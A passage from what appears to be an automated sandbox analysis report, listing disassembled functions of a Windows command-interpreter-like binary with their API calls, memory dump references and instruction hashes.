                                                                              • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00000000,00007FF64B573491,?,?,?,00007FF64B584420), ref: 00007FF64B573514
                                                                              • _get_osfhandle.MSVCRT ref: 00007FF64B573522
                                                                              • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,00000000,00007FF64B573491,?,?,?,00007FF64B584420), ref: 00007FF64B573541
                                                                              • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00000000,00007FF64B573491,?,?,?,00007FF64B584420), ref: 00007FF64B57355E
                                                                                • Part of subcall function 00007FF64B5736EC: _get_osfhandle.MSVCRT ref: 00007FF64B573715
                                                                                • Part of subcall function 00007FF64B5736EC: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF64B573770
                                                                                • Part of subcall function 00007FF64B5736EC: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF64B573791
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: LockShared$_get_osfhandle$AcquireConsoleFileReleaseWrite$ByteCharHandleModeMultiTypeWide
                                                                              • String ID:
                                                                              • API String ID: 4057327938-0
                                                                              • Opcode ID: 88fe3d8dcb1b39454ed35e4d5bc75a190f5634e19a67efeee45e7c5e6c767e8c
                                                                              • Instruction ID: 1b8ba1c532ee76bfa60844cc753dd4020880207d1c9c4c7ba8ed116f5f55433a
                                                                              • Opcode Fuzzy Hash: 88fe3d8dcb1b39454ed35e4d5bc75a190f5634e19a67efeee45e7c5e6c767e8c
                                                                              • Instruction Fuzzy Hash: 4B316F62B0CB42C6E75CBF25D400079FAA5EF8DB50F588175DA2EC23B7DE6CE8058600
                                                                              Function 00007FF64B573578 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _get_osfhandle.MSVCRT ref: 00007FF64B573584
                                                                              • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF64B5632E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF64B57359C
                                                                              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF64B5632E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF64B5735C3
                                                                              • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF64B5632E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF64B5735D9
                                                                              • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF64B5632E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF64B5735ED
                                                                              • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF64B5632E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF64B573602
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
                                                                              • String ID:
                                                                              • API String ID: 513048808-0
                                                                              • Opcode ID: 03f01a8104886db99b7aad40b47997af4647daf6f98f1b4f0a1f116e85409c1b
                                                                              • Instruction ID: 77fcd546f27cce107fb0798da351c41e2c93736c2ac9582547f186106171dfb8
                                                                              • Opcode Fuzzy Hash: 03f01a8104886db99b7aad40b47997af4647daf6f98f1b4f0a1f116e85409c1b
                                                                              • Instruction Fuzzy Hash: 4D114C21B1CA46C6EA58BF24E544078EAA0FB4E775F149334DA3E823F2DE6CD4468600
                                                                              Function 00007FF64B579584 Relevance: 9.0, APIs: 6, Instructions: 49timethreadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
                                                                              • String ID:
                                                                              • API String ID: 4104442557-0
                                                                              • Opcode ID: b889aecb1d922b30460546f960472bac4e2facbbb0b8017922a5a639f3fd93e9
                                                                              • Instruction ID: 45f12e7e4217ca2d569f6ad7cf96e5caf7a8c75172c569006e62be6ecb857bf5
                                                                              • Opcode Fuzzy Hash: b889aecb1d922b30460546f960472bac4e2facbbb0b8017922a5a639f3fd93e9
                                                                              • Instruction Fuzzy Hash: AE111262609B41CAEB04FF64E84526873A4F71D758F400A34EA7D877B5EF7CD6558340
                                                                              Function 00007FF64B58711C Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 175COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF64B5871F9
                                                                              • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF64B58720D
                                                                              • OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF64B587300
                                                                                • Part of subcall function 00007FF64B585740: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?,?,?,00007FF64B5875C4,?,?,00000000,00007FF64B586999,?,?,?,?,?,00007FF64B578C39), ref: 00007FF64B585744
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: OpenSemaphore$CloseErrorHandleLast
                                                                              • String ID: _p0$wil
                                                                              • API String ID: 455305043-1814513734
                                                                              • Opcode ID: 39a27b84dfd8631c9037e55d178cc10ed73d1848b9dee361412bcbd5f2f98ace
                                                                              • Instruction ID: a1b43c73a0510d16337b76d66571b3518d32cbb747a04a75d6d9583e007436b1
                                                                              • Opcode Fuzzy Hash: 39a27b84dfd8631c9037e55d178cc10ed73d1848b9dee361412bcbd5f2f98ace
                                                                              • Instruction Fuzzy Hash: D4618162B2D78285EF29FF56D4102B9A3A1EF8CB80F544531DA1E8B7A6EF3CD5158300
                                                                              Function 00007FF64B56E260 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 128COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: iswdigit
                                                                              • String ID: GeToken: (%x) '%s'
                                                                              • API String ID: 3849470556-1994581435
                                                                              • Opcode ID: b1c74980886186fc2843b8190b4a082341e47de456d20d62b3525a594f11c7d8
                                                                              • Instruction ID: 595c0af818281513534fe86b24c4349ceb1004b95aefe87c43a197d25ef84b6d
                                                                              • Opcode Fuzzy Hash: b1c74980886186fc2843b8190b4a082341e47de456d20d62b3525a594f11c7d8
                                                                              • Instruction Fuzzy Hash: 07515821A0D642C5EB28BF1AE44527DB7A0BB5CB54F449835DA6D833B2EF7CE885C710
                                                                              Function 00007FF64B58992C Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 121registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF64B589A10
                                                                              • RegEnumKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF64B589994
                                                                                • Part of subcall function 00007FF64B58A73C: RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF64B589A82), ref: 00007FF64B58A77A
                                                                                • Part of subcall function 00007FF64B58A73C: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF64B589A82), ref: 00007FF64B58A839
                                                                                • Part of subcall function 00007FF64B58A73C: RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF64B589A82), ref: 00007FF64B58A850
                                                                              • wcsrchr.MSVCRT ref: 00007FF64B589A62
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast$CloseEnumOpenwcsrchr
                                                                              • String ID: %s=%s$.
                                                                              • API String ID: 3242694432-4275322459
                                                                              • Opcode ID: f0a6781f902405e6d501dc5d40a6bf5070585413eea37f1d1ba285c718ededde
                                                                              • Instruction ID: 2b24f8d4795336d0c06bddfbc75a8956114daf5fafeafc07e1b22e6ba4dc8424
                                                                              • Opcode Fuzzy Hash: f0a6781f902405e6d501dc5d40a6bf5070585413eea37f1d1ba285c718ededde
                                                                              • Instruction Fuzzy Hash: 5D419E21A1D78285EA18BF51E0502BAF2A1AF9D7A0F446234DD7D873F7EE7CE4518700
                                                                              Function 00007FF64B5854B0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 120synchronizationCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF64B5854E6
                                                                              • CreateMutexExW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF64B58552E
                                                                                • Part of subcall function 00007FF64B58758C: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF64B586999,?,?,?,?,?,00007FF64B578C39), ref: 00007FF64B5875AE
                                                                                • Part of subcall function 00007FF64B58758C: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF64B586999,?,?,?,?,?,00007FF64B578C39), ref: 00007FF64B5875C6
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast$CreateCurrentMutexProcess
                                                                              • String ID: Local\SM0:%d:%d:%hs$wil$x
                                                                              • API String ID: 779401067-630742106
                                                                              • Opcode ID: 455202d7a479b8eb008443c79237f92c22bbe4b1cb8e523106a0b0b2338ac627
                                                                              • Instruction ID: 63e222650776b9c5cb63c8a367988007d9daa963f3eee444cf30113537f60f49
                                                                              • Opcode Fuzzy Hash: 455202d7a479b8eb008443c79237f92c22bbe4b1cb8e523106a0b0b2338ac627
                                                                              • Instruction Fuzzy Hash: FE51837262C68282EB29BF15F4007FAE761EB8CB84F445031EA1DCBAA6DE7CD5158740
                                                                              Function 00007FF64B57417C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: CurrentDirectorytowupper
                                                                              • String ID: :$:
                                                                              • API String ID: 238703822-3780739392
                                                                              • Opcode ID: a6328a6c3dc4b43d0528279963caee78f723bc6a38f6b0cfe87d14265630f542
                                                                              • Instruction ID: 77331d6cdee2dca27621a214bf7831e230e936a3fb313d37ccc6cc1eb48cafd6
                                                                              • Opcode Fuzzy Hash: a6328a6c3dc4b43d0528279963caee78f723bc6a38f6b0cfe87d14265630f542
                                                                              • Instruction Fuzzy Hash: 1811005261C641C2EA29BF61E805239F6A0EF8D799F498032DD1D877B2EE3CD0428704
                                                                              Function 00007FF64B5658D4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: CloseOpenQueryValue
                                                                              • String ID: Software\Microsoft\Windows NT\CurrentVersion$UBR
                                                                              • API String ID: 3677997916-3870813718
                                                                              • Opcode ID: f05f94d0e8c90ab29cc9672b6bad58f1af5175f7397cd948b2f834cc6da7e466
                                                                              • Instruction ID: a6f27eea6f9bb10aec5bb9cdf961a54233efea7657e29c5f91b395894d2334e3
                                                                              • Opcode Fuzzy Hash: f05f94d0e8c90ab29cc9672b6bad58f1af5175f7397cd948b2f834cc6da7e466
                                                                              • Instruction Fuzzy Hash: 5311287261CA45C7EA24AF24E44026AF7A0FB8A764F405231DA9D42779DF7CC448CF00
                                                                              Function 00007FF64B564C18 Relevance: 7.7, APIs: 5, Instructions: 163COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: memsetwcsrchr$wcschr
                                                                              • String ID:
                                                                              • API String ID: 110935159-0
                                                                              • Opcode ID: aa437b30edfeea6c79ee8a3d268e9650db73263b89b04e44864cdff78747c223
                                                                              • Instruction ID: 17c5ba25b19695352027ba18cf8387520307035b5ee9c207f4ba178350bc9ab2
                                                                              • Opcode Fuzzy Hash: aa437b30edfeea6c79ee8a3d268e9650db73263b89b04e44864cdff78747c223
                                                                              • Instruction Fuzzy Hash: EE51A362B0D78685FE69BF15E4043F9A6A1AF4CBA4F045130CE6D8B7A6DE3CE5558200
                                                                              Function 00007FF64B575EE4 Relevance: 7.6, APIs: 5, Instructions: 146COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: memset$CurrentDirectorytowupper
                                                                              • String ID:
                                                                              • API String ID: 1403193329-0
                                                                              • Opcode ID: 551be3f87909853a01787b2c064555cc9cf119e68c8c6485403ce92ba455aa8e
                                                                              • Instruction ID: 26afa52f8343ea04ffaf99cc040d4662412c9d08f603343009444a97d64b6e7a
                                                                              • Opcode Fuzzy Hash: 551be3f87909853a01787b2c064555cc9cf119e68c8c6485403ce92ba455aa8e
                                                                              • Instruction Fuzzy Hash: A2518026B0D6C186EB29FF21D9006BAB7A0EF4C758F45C135CA2D876A6EFBC95448710
                                                                              Function 00007FF64B56DF60 Relevance: 7.6, APIs: 5, Instructions: 114memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: Heap$FreeProcess_setjmp
                                                                              • String ID:
                                                                              • API String ID: 777023205-0
                                                                              • Opcode ID: bbf52200d93ced3108c92f56beefed0410d329e72fd007d8cbedcbd411aea915
                                                                              • Instruction ID: 7f70dd58b3785a621e33ae70e19cfff81c81a1e39233236c83a74c56ed9a4b11
                                                                              • Opcode Fuzzy Hash: bbf52200d93ced3108c92f56beefed0410d329e72fd007d8cbedcbd411aea915
                                                                              • Instruction Fuzzy Hash: 66512830E0EA4299EA59BF15F880578F6A0FF4C750F545836DA6ED62B3DF3DA441CA10
                                                                              Function 00007FF64B56B49C Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 106COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _wcsicmp.MSVCRT ref: 00007FF64B56B4BD
                                                                                • Part of subcall function 00007FF64B5706C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF64B56B4DB), ref: 00007FF64B5706D6
                                                                                • Part of subcall function 00007FF64B5706C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF64B56B4DB), ref: 00007FF64B5706F0
                                                                                • Part of subcall function 00007FF64B5706C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF64B56B4DB), ref: 00007FF64B57074D
                                                                                • Part of subcall function 00007FF64B5706C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF64B56B4DB), ref: 00007FF64B570762
                                                                              • _wcsicmp.MSVCRT ref: 00007FF64B56B518
                                                                              • _wcsicmp.MSVCRT ref: 00007FF64B56B58B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: Heap$_wcsicmp$AllocProcess
                                                                              • String ID: ELSE$IF/?
                                                                              • API String ID: 3223794493-1134991328
                                                                              • Opcode ID: 423616b0ad94ea500b20ba8b377132b2965d659a86947a17f8aec48fbfe776c9
                                                                              • Instruction ID: 805dfdac44b812689a46f7233370ab62b41bf04329da8c869ab6ef9956e55db2
                                                                              • Opcode Fuzzy Hash: 423616b0ad94ea500b20ba8b377132b2965d659a86947a17f8aec48fbfe776c9
                                                                              • Instruction Fuzzy Hash: D0411A61E0D64382FA6CBF24E4522BDA7A5AF5C740F546435D62EC63B7EE7CE8018740
                                                                              Function 00007FF64B58E3E8 Relevance: 7.6, APIs: 5, Instructions: 105fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: memset$File_get_osfhandle$PointerReadlongjmp
                                                                              • String ID:
                                                                              • API String ID: 1532185241-0
                                                                              • Opcode ID: 771aa78906e2d4e00bf09d1751668696db7999ff0f41d10bb5d7c13c5b4464d7
                                                                              • Instruction ID: 46e79fc22fda5b4fe543c13028d68c17061399e45e339db3c9264f036416f716
                                                                              • Opcode Fuzzy Hash: 771aa78906e2d4e00bf09d1751668696db7999ff0f41d10bb5d7c13c5b4464d7
                                                                              • Instruction Fuzzy Hash: 6741C232A2875187E718BF21E44567DBAA1FB8CB40F445535EA2E837B6CF3CE8518B00
                                                                              Function 00007FF64B564FE8 Relevance: 7.6, APIs: 5, Instructions: 102fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorFileLast$DeleteRead_get_osfhandle
                                                                              • String ID:
